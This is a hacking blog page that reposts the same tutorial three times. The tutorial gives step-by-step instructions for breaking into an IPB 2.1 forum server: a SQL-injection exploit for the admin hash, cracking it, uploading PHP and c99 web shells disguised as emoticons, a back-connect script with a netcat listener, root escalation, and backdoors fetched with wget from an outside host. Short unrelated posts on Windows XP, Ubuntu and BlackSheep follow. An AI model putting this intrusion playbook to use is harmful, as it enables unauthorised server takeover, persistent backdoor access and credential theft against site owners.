Your IP by I.EH Radar

Tuesday, 17 May 2011

ROUTING AND EXPLOITING WEBSERVERS

Exploiting & Rooting a Webserver!

Exploiting and Rooting a Webserver from



I.E.H Complete Tutorial



EXPLOIT AND ROUTING A WEBSERVER



Hey guys this is The 7th Sage and for todays tutorial we shall learn how to

exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.



1) Gaining Admin Access.

2) Uploading The Shell

3) Using the Shell to Gain Root Access



Hacking a Forum Admin using Exploit to Gain,

Admin Access - Part 1:



As said earlier i'm going to exploit ipb v2.1 forum here. You can hack



other forums too using exploits or making own exploits (which is rare )



Tools Needed:



This has the shell and backdoor files along with MD5 HashCracking tool and



some other things.



Download:



Code:

http://depositfiles.com/files/9juskrtaxGaining Admin Access:



For today i will be hacking an ipb 2.1 forum by gaining admin access and



then I will show you how to root the server.



First i will be using a perl exploit and gain admin access to the forum. Usually the admin id



is 1 maybe 0 or 2 sometimes.



Here it is this guy:



UserName: Kawool

UserId = 2



Next we extract the user hash and salt. Switch to cmd and execute the perl



exploit.



Then you should see this sql injection tool.



Change the forum index path, userid (of the admin), the table name.



After you click get data from database you should see this hash:



Then use converage pass salt option.



After you get the hash the next step to do is crack the salted hash. Since



it is ipb , cracking the hash will be a pain for sure.



Cracking the Hash:



I have provided passwords pro in the download above. It is a very efficient

tool to crack md5 hashes, even salted ones.



Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.



I got mine after sometime.



So now:



Code:

Username: Kawool



Password: *******I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.



Uploading The Shell as Admin - Part 2:



Uploading a Shell:



Now that we have the admin access in our hand now is the part when we



upload a shell (For those who don't know what a shell is, It is a php script that gives



privilages to upload files on a website, mess with other files etc. And yeah allows to gain



root access too).



Uploading shell as smiley here.



In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.



Now lets browse our shell shall we..



w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did



this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.



Once its done we upload c99 shell.



Good shell was uploaded properly.



That does it for our 2nd part. Move on to Third.



Using the Shell to Gain Root Access - Part 3:



Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.



So i upload back.pl i provided in the file.



After thats done time to use the script.



For this we give the following code.



Code:

perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and start listening to conenctions on



port 2121.



use netcat from my downloadfile, and use the command:



Code:

nc -vv -l -p 2121You should see something like this:



Next we shall upload an exploit that will let us obtain root status on the server



Time to execute it.



Now we upload a backdoor for future access.



Type in the following command:



Code:

wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)Now the following command:



Code:

tar -zxvf sshdoor.tgzThen we make sshdoor the current directory using this code:



Code:

cd sshdoorThen:



Code:

cat READMEafter you see the window with sang and prabu name. Execute the command:



Code:

.install yourpassword 2121After thats done, we connect to the server via putty.



Err an Epic Fail has occured my friends.



Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).



Now we upload xbind.c this should be over quickly. Remember the steps don't you?



Indeed its easy.



Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):



Code:

gcc -o xbind xbind.cCompile, run and connect.



Paste the following code now:



Code:

./xbind 1985Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.



Now enter teh password and get going.



Code:

uname -aThere you go, we now have future access to the server



That does it for our Rooting Server tutorial which will be "tltr" for some people. Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment



Thanks If u Liked This!

This Tut Not By Me

Thursday, 12 May 2011

INDIAN ETHICAL HACKING(I.E.H): Reasons to Try Ubuntu 10.10

INDIAN ETHICAL HACKING(I.E.H): Reasons to Try Ubuntu 10.10: "Reasons to Try Ubuntu 10.10 As Ubuntu 10.10, or 'Maverick Meerkat,' hits the streets this Sunday, it's a pretty safe bet that legions of..."

ROUTING AND EXPLOITING WEBSERVERS

Exploiting & Rooting a Webserver!
Exploiting and Rooting a Webserver from

I.E.H Complete Tutorial

EXPLOIT AND ROUTING A WEBSERVER

Hey guys this is The 7th Sage and for todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain,
Admin Access - Part 1:

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare )

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.

Download:

Code:
http://depositfiles.com/files/9juskrtaxGaining Admin Access:

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.

Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.

After you click get data from database you should see this hash:

Then use converage pass salt option.

After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

So now:

Code:
Username: Kawool

Password: *******I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.

Now lets browse our shell shall we..

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.

Good shell was uploaded properly.

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress
BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121You should see something like this:

Next we shall upload an exploit that will let us obtain root status on the server

Time to execute it.

Now we upload a backdoor for future access.

Type in the following command:

Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)Now the following command:

Code:
tar -zxvf sshdoor.tgzThen we make sshdoor the current directory using this code:

Code:
cd sshdoorThen:

Code:
cat READMEafter you see the window with sang and prabu name. Execute the command:

Code:
.install yourpassword 2121After thats done, we connect to the server via putty.

Err an Epic Fail has occured my friends.

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).

Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.

Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):

Code:
gcc -o xbind xbind.cCompile, run and connect.

Paste the following code now:

Code:
./xbind 1985Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:
uname -aThere you go, we now have future access to the server

That does it for our Rooting Server tutorial which will be "tltr" for some people. Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment

Thanks If u Liked This!
This Tut Not By Me

ROUTING AND EXPLOITING WEBSERVERS

Exploiting & Rooting a Webserver!
Exploiting and Rooting a Webserver from

I.E.H Complete Tutorial

EXPLOIT AND ROUTING A WEBSERVER

Hey guys this is The 7th Sage and for todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain,
Admin Access - Part 1:

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare )

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.

Download:

Code:
http://depositfiles.com/files/9juskrtaxGaining Admin Access:

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.

Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.

After you click get data from database you should see this hash:

Then use converage pass salt option.

After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

So now:

Code:
Username: Kawool

Password: *******I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.

Now lets browse our shell shall we..

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.

Good shell was uploaded properly.

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress
BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121You should see something like this:

Next we shall upload an exploit that will let us obtain root status on the server

Time to execute it.

Now we upload a backdoor for future access.

Type in the following command:

Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)Now the following command:

Code:
tar -zxvf sshdoor.tgzThen we make sshdoor the current directory using this code:

Code:
cd sshdoorThen:

Code:
cat READMEafter you see the window with sang and prabu name. Execute the command:

Code:
.install yourpassword 2121After thats done, we connect to the server via putty.

Err an Epic Fail has occured my friends.

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).

Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.

Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):

Code:
gcc -o xbind xbind.cCompile, run and connect.

Paste the following code now:

Code:
./xbind 1985Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:
uname -aThere you go, we now have future access to the server

That does it for our Rooting Server tutorial which will be "tltr" for some people. Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment

Thanks If u Liked This!
This Tut Not By Me

HOW TO LOGIN AS ADMIN IN XP

How to login as Administrator in Windows XP?

The built-in Administrator account is hidden from Welcome Screen when a user account with Administrator privileges exists and enabled. In Windows XP Home Edition, you can login as built-in Administrator in Safe Mode only. For XP Professional, press CTRL + ALT + DEL twice at the Welcome Screen and input your Administrator password in the classic logon window that appears.
To have the Administrator account displayed in the Welcome Screen, try one of these methods:
Method 1: Using TweakUI Power Toy for Windows XP
Download TweakUI from here:
v2.00 for Windows XP  |  v2.10 for XP SP1 and above
Open TweakUI and click "Logon" option in the left pane. Put a checkmark against the option "Show Administrator on Welcome Screen". Click OK to close TweakUI. Logoff and see if Welcome Screen lists Administrator login. Changes are immediate and you can use the Winkey + L to switch back to Welcome Screen to see Administrator account is listed.
Use this procedure to hide/unhide any user account from the Welcome Screen. Please remember, you can still login to a hidden account using CTRL+ALT+DEL classic logon method, but cannot Fast User Switch to a hidden user account.
Method 2 - Manual registry edit
•Click Start, Run and type Regedit.exe
•Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
•Use the File, Export option to backup the key
•Create a new DWORD Value named Administrator
•Double-click Administrator, and set 1 as its data
•Exit the Registry Editor.
For Windows XP Home Edition
While you can configure Windows XP Home Edition to show Administrator account in the Welcome Screen, you cannot login as Administrator in Normal mode.

Thursday, 5 May 2011

Reasons to Try Ubuntu 10.10




Reasons to Try Ubuntu 10.10


As Ubuntu 10.10, or "Maverick Meerkat," hits the streets this Sunday, it's a pretty safe bet that legions of existing Ubuntu users will be updating to the new release. After all, it looks to be Canonical's most user-friendly Ubuntu Linux yet, and many of the new features promise to be must-haves.For those in the business world who haven't yet tried Ubuntu, however, the reasons to download and give it a whirl are even more compelling. Here are just a few of them. 1. SpeedUbuntu 10.10 is fast -- darn fast. Even the beta version could boot in as little as 7 seconds, according to reports. Who has time to wait around for Windows when there's work to be done

JOIN I.E.H FOR SECURING YOURSELF

JOIN I.E.H FOR SECURING YOURSELF



Blacksheep : Another Way to Avoid FireSheep!

This is an intelligent tool in a sense that you get to know the IP address of the attacker who is running FireSheep. Suitably, BlackSheep is also a Firefox plugin, that is designed to combat FireSheep. It does so by dropping 'fake' session IDs on the wire and then monitoring traffic to see if it has been hijacked. BlackSheep identifies FireSheep via a request to a domain that it identifies session information. Using this hijacked session information, FireSheep contacts the targeted host in order to obtain the name of the hijacked user along with an image of the person, if available. When identified, the user will be receive the following warning message:
Follow us on   I.E.H